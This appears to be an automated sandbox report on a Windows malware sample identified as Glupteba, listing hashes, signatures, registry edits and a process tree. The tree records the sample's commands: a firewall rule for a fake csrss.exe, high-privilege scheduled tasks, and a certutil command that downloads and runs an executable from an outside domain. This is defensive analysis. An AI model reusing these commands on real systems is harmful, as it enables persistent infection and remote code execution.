Analysis
-
max time kernel
205s -
max time network
227s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2022 08:53
Static task
static1
Behavioral task
behavioral1
Sample
c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
Resource
win10v2004-20221111-en
General
-
Target
c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
-
Size
3.8MB
-
MD5
83dac15991d182e1e0996e09d05c358d
-
SHA1
597fc6049d50ebbde4d3bc09a5d40ac8ea8caaf2
-
SHA256
c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae
-
SHA512
090576d9e77c794282f3e9f58128be58867ec4a2901853dafd2b53123a09d7c97d7dd28bd8ac66a481713c51c5fe58ad0dac67f4f04ff588721f39d1599714a2
-
SSDEEP
98304:Q9BvHl5/baM7kFh4KiCIJPNIm8ouO1ua:Q9F/baM7kTIJlIm8oZ
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba payload 10 IoCs
Processes:
resource yara_rule behavioral2/memory/4908-133-0x00000000048E0000-0x00000000050E2000-memory.dmp family_glupteba behavioral2/memory/4908-134-0x0000000000400000-0x00000000025C4000-memory.dmp family_glupteba behavioral2/memory/4908-135-0x00000000048E0000-0x00000000050E2000-memory.dmp family_glupteba behavioral2/memory/4908-136-0x0000000000400000-0x00000000025C4000-memory.dmp family_glupteba behavioral2/memory/4908-138-0x0000000000400000-0x00000000025C4000-memory.dmp family_glupteba behavioral2/memory/2236-141-0x0000000000400000-0x00000000025C4000-memory.dmp family_glupteba behavioral2/memory/2236-143-0x0000000000400000-0x00000000025C4000-memory.dmp family_glupteba behavioral2/memory/2236-147-0x0000000000400000-0x00000000025C4000-memory.dmp family_glupteba behavioral2/memory/3220-149-0x0000000000400000-0x00000000025C4000-memory.dmp family_glupteba behavioral2/memory/3220-152-0x0000000000400000-0x00000000025C4000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
svchost.exedescription pid process target process PID 904 created 4908 904 svchost.exe c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe PID 904 created 3220 904 svchost.exe csrss.exe PID 904 created 3220 904 svchost.exe csrss.exe PID 904 created 3220 904 svchost.exe csrss.exe -
Executes dropped EXE 2 IoCs
Processes:
csrss.exepatch.exepid process 3220 csrss.exe 4088 patch.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DivineSmoke = "\"C:\\Windows\\rss\\csrss.exe\"" c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 2640 bcdedit.exe -
Drops file in Windows directory 2 IoCs
Processes:
c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exedescription ioc process File opened for modification C:\Windows\rss c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe File created C:\Windows\rss\csrss.exe c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2564 schtasks.exe 2856 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" csrss.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exec8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exepid process 4908 c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe 4908 c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe 2236 c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe 2236 c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exesvchost.execsrss.exedescription pid process Token: SeDebugPrivilege 4908 c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe Token: SeImpersonatePrivilege 4908 c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe Token: SeTcbPrivilege 904 svchost.exe Token: SeTcbPrivilege 904 svchost.exe Token: SeBackupPrivilege 904 svchost.exe Token: SeRestorePrivilege 904 svchost.exe Token: SeBackupPrivilege 904 svchost.exe Token: SeRestorePrivilege 904 svchost.exe Token: SeSystemEnvironmentPrivilege 3220 csrss.exe Token: SeBackupPrivilege 904 svchost.exe Token: SeRestorePrivilege 904 svchost.exe Token: SeBackupPrivilege 904 svchost.exe Token: SeRestorePrivilege 904 svchost.exe Token: SeBackupPrivilege 904 svchost.exe Token: SeRestorePrivilege 904 svchost.exe Token: SeBackupPrivilege 904 svchost.exe Token: SeRestorePrivilege 904 svchost.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
svchost.exec8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.execmd.execsrss.exedescription pid process target process PID 904 wrote to memory of 2236 904 svchost.exe c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe PID 904 wrote to memory of 2236 904 svchost.exe c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe PID 904 wrote to memory of 2236 904 svchost.exe c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe PID 2236 wrote to memory of 1968 2236 c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe cmd.exe PID 2236 wrote to memory of 1968 2236 c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe cmd.exe PID 1968 wrote to memory of 4240 1968 cmd.exe netsh.exe PID 1968 wrote to memory of 4240 1968 cmd.exe netsh.exe PID 2236 wrote to memory of 3220 2236 c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe csrss.exe PID 2236 wrote to memory of 3220 2236 c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe csrss.exe PID 2236 wrote to memory of 3220 2236 c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe csrss.exe PID 904 wrote to memory of 2856 904 svchost.exe schtasks.exe PID 904 wrote to memory of 2856 904 svchost.exe schtasks.exe PID 904 wrote to memory of 2564 904 svchost.exe schtasks.exe PID 904 wrote to memory of 2564 904 svchost.exe schtasks.exe PID 904 wrote to memory of 4088 904 svchost.exe patch.exe PID 904 wrote to memory of 4088 904 svchost.exe patch.exe PID 3220 wrote to memory of 2640 3220 csrss.exe bcdedit.exe PID 3220 wrote to memory of 2640 3220 csrss.exe bcdedit.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe"C:\Users\Admin\AppData\Local\Temp\c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4908 -
C:\Users\Admin\AppData\Local\Temp\c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe"C:\Users\Admin\AppData\Local\Temp\c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:4240 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:2856 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
PID:2564 -
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
PID:4088 -
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
PID:2640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:904
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
C:\Windows\rss\csrss.exeFilesize
3.8MB
MD583dac15991d182e1e0996e09d05c358d
SHA1597fc6049d50ebbde4d3bc09a5d40ac8ea8caaf2
SHA256c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae
SHA512090576d9e77c794282f3e9f58128be58867ec4a2901853dafd2b53123a09d7c97d7dd28bd8ac66a481713c51c5fe58ad0dac67f4f04ff588721f39d1599714a2
-
C:\Windows\rss\csrss.exeFilesize
3.8MB
MD583dac15991d182e1e0996e09d05c358d
SHA1597fc6049d50ebbde4d3bc09a5d40ac8ea8caaf2
SHA256c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae
SHA512090576d9e77c794282f3e9f58128be58867ec4a2901853dafd2b53123a09d7c97d7dd28bd8ac66a481713c51c5fe58ad0dac67f4f04ff588721f39d1599714a2
-
memory/1968-140-0x0000000000000000-mapping.dmp
-
memory/2236-137-0x0000000000000000-mapping.dmp
-
memory/2236-147-0x0000000000400000-0x00000000025C4000-memory.dmpFilesize
33.8MB
-
memory/2236-139-0x000000000430F000-0x00000000046B6000-memory.dmpFilesize
3.7MB
-
memory/2236-141-0x0000000000400000-0x00000000025C4000-memory.dmpFilesize
33.8MB
-
memory/2236-143-0x0000000000400000-0x00000000025C4000-memory.dmpFilesize
33.8MB
-
memory/2564-151-0x0000000000000000-mapping.dmp
-
memory/2640-155-0x0000000000000000-mapping.dmp
-
memory/2856-150-0x0000000000000000-mapping.dmp
-
memory/3220-144-0x0000000000000000-mapping.dmp
-
memory/3220-148-0x0000000004600000-0x00000000049A7000-memory.dmpFilesize
3.7MB
-
memory/3220-149-0x0000000000400000-0x00000000025C4000-memory.dmpFilesize
33.8MB
-
memory/3220-152-0x0000000000400000-0x00000000025C4000-memory.dmpFilesize
33.8MB
-
memory/4088-153-0x0000000000000000-mapping.dmp
-
memory/4240-142-0x0000000000000000-mapping.dmp
-
memory/4908-132-0x0000000004538000-0x00000000048DF000-memory.dmpFilesize
3.7MB
-
memory/4908-138-0x0000000000400000-0x00000000025C4000-memory.dmpFilesize
33.8MB
-
memory/4908-136-0x0000000000400000-0x00000000025C4000-memory.dmpFilesize
33.8MB
-
memory/4908-135-0x00000000048E0000-0x00000000050E2000-memory.dmpFilesize
8.0MB
-
memory/4908-134-0x0000000000400000-0x00000000025C4000-memory.dmpFilesize
33.8MB
-
memory/4908-133-0x00000000048E0000-0x00000000050E2000-memory.dmpFilesize
8.0MB